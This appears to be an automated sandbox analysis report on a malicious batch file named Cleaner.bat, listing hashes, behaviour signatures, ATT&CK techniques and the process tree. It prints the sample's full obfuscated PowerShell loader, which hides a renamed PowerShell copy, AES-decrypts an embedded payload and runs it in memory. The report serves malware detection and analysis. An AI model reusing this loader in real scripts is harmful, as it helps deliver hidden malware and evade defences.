0162d08202e23240665087b0dfe32652406b6c0595096bb6666234e829cd6233

General

Target

Cleaner.bat
Size

3.1MB
MD5

b0f63b3801d950a3ce8f27d08d4b413a
SHA1

5445683bc8c1bdc716ae84cd59dea91ae814dd19
SHA256

0162d08202e23240665087b0dfe32652406b6c0595096bb6666234e829cd6233
SHA512

051f9fcba315db5f9cc0dec07c1736f984ef94151b92e7ecc3c6823529f4e55270ff44bd08416a77a9f0eb8c732b679ff0500932d309ab51e645b4db909cfc43

Score

8^/10

evasion

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

Cleaner.bat.exe

pid process

628 Cleaner.bat.exe
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1468 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

Cleaner.bat.exe

pid process

628 Cleaner.bat.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Cleaner.bat.exe

description pid process

Token: SeDebugPrivilege 628 Cleaner.bat.exe

pid	process
628	Cleaner.bat.exe

pid	process
1468	cmd.exe

pid	process
628	Cleaner.bat.exe

description	pid	process
Token: SeDebugPrivilege	628	Cleaner.bat.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

cmd.exeCleaner.bat.exe

description	pid	process	target process
PID 1468 wrote to memory of 820	1468	cmd.exe	cmd.exe
PID 1468 wrote to memory of 820	1468	cmd.exe	cmd.exe
PID 1468 wrote to memory of 820	1468	cmd.exe	cmd.exe
PID 1468 wrote to memory of 1992	1468	cmd.exe	xcopy.exe
PID 1468 wrote to memory of 1992	1468	cmd.exe	xcopy.exe
PID 1468 wrote to memory of 1992	1468	cmd.exe	xcopy.exe
PID 1468 wrote to memory of 968	1468	cmd.exe	attrib.exe
PID 1468 wrote to memory of 968	1468	cmd.exe	attrib.exe
PID 1468 wrote to memory of 968	1468	cmd.exe	attrib.exe
PID 1468 wrote to memory of 628	1468	cmd.exe	Cleaner.bat.exe
PID 1468 wrote to memory of 628	1468	cmd.exe	Cleaner.bat.exe
PID 1468 wrote to memory of 628	1468	cmd.exe	Cleaner.bat.exe
PID 628 wrote to memory of 1372	628	Cleaner.bat.exe	csc.exe
PID 628 wrote to memory of 1372	628	Cleaner.bat.exe	csc.exe
PID 628 wrote to memory of 1372	628	Cleaner.bat.exe	csc.exe
PID 1468 wrote to memory of 1032	1468	cmd.exe	attrib.exe
PID 1468 wrote to memory of 1032	1468	cmd.exe	attrib.exe
PID 1468 wrote to memory of 1032	1468	cmd.exe	attrib.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

968 attrib.exe
1032 attrib.exe

pid	process
968	attrib.exe
1032	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F"
2⤵
PID:820

C:\Windows\system32\xcopy.exe
xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe" /y
2⤵
PID:1992

C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"
2⤵
- Views/modifies file attributes
PID:968

C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
Cleaner.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $cpGMmW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Cleaner.bat').Split([Environment]::NewLine);$vKMTac = $cpGMmW[$cpGMmW.Length - 1];$qUeblb = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgZHlIZHhWIHsgcHVibGljIHN0YXRpYyBieXRlW10gSHVTTFdiKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gRndaYVdtKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9'));Add-Type -TypeDefinition $qUeblb;[System.Reflection.Assembly]::Load([dyHdxV]::FwZaWm([dyHdxV]::HuSLWb([System.Convert]::FromBase64String($vKMTac), [System.Convert]::FromBase64String('GpALIgw8Bm2Ku/F1LxriAEFFGLwksa0vKKHsogEGbsM='), [System.Convert]::FromBase64String('0GcmDM5eLt1yF271xja3FQ==')))).EntryPoint.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vq_cgk1s.cmdline"
3⤵
PID:1372

C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"
2⤵
- Views/modifies file attributes
PID:1032

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

2

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

2

T1158

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vq_cgk1s.0.cs
Filesize
744B

MD5
7ba109a6ade3811040a994c47678a924

SHA1
852d06b7e9d96fcd7ed0de7dca03882044d6684a

SHA256
82b5ccd87e34e64a00145fe3a7baaeb2fec10213583a32cf7a0327516fe960e3

SHA512
f81a5f1899594ab262ee4f57b3f4af58ed991d7db9bc48ec1397f9caa966f53e660e4e35fc0bfadc55ca13850b3727a2fab68ef42d445cd96ee290cfc11f4971

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vq_cgk1s.cmdline
Filesize
309B

MD5
f0df972c32b5c646e8daf7eab4f05f8a

SHA1
3181a85879c58713fc79f6147963716dc1606934

SHA256
4239fb5041edd1d60b8ce4e57875adb7ed3a3674c6b669de9616e5e8141b1be4

SHA512
a4ccd209b72e9d19acf349d41ca825014c9b749cb68b0844862714ab03dbcea39f34e643b77e9048cdf9bd2a5f5c94aaa63d3f4d7138c082af1650e14f3757ee

Download Submit
\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/628-59-0x0000000000000000-mapping.dmp

Download
memory/628-61-0x000007FEFB551000-0x000007FEFB553000-memory.dmp

Filesize
8KB

Download
memory/628-62-0x000007FEF26A0000-0x000007FEF31FD000-memory.dmp

Filesize
11.4MB

Download
memory/628-67-0x000000000252B000-0x000000000254A000-memory.dmp

Filesize
124KB

Download
memory/628-66-0x0000000002524000-0x0000000002527000-memory.dmp

Filesize
12KB

Download
memory/820-54-0x0000000000000000-mapping.dmp

Download
memory/968-56-0x0000000000000000-mapping.dmp

Download
memory/1032-68-0x0000000000000000-mapping.dmp

Download
memory/1372-63-0x0000000000000000-mapping.dmp

Download
memory/1992-55-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing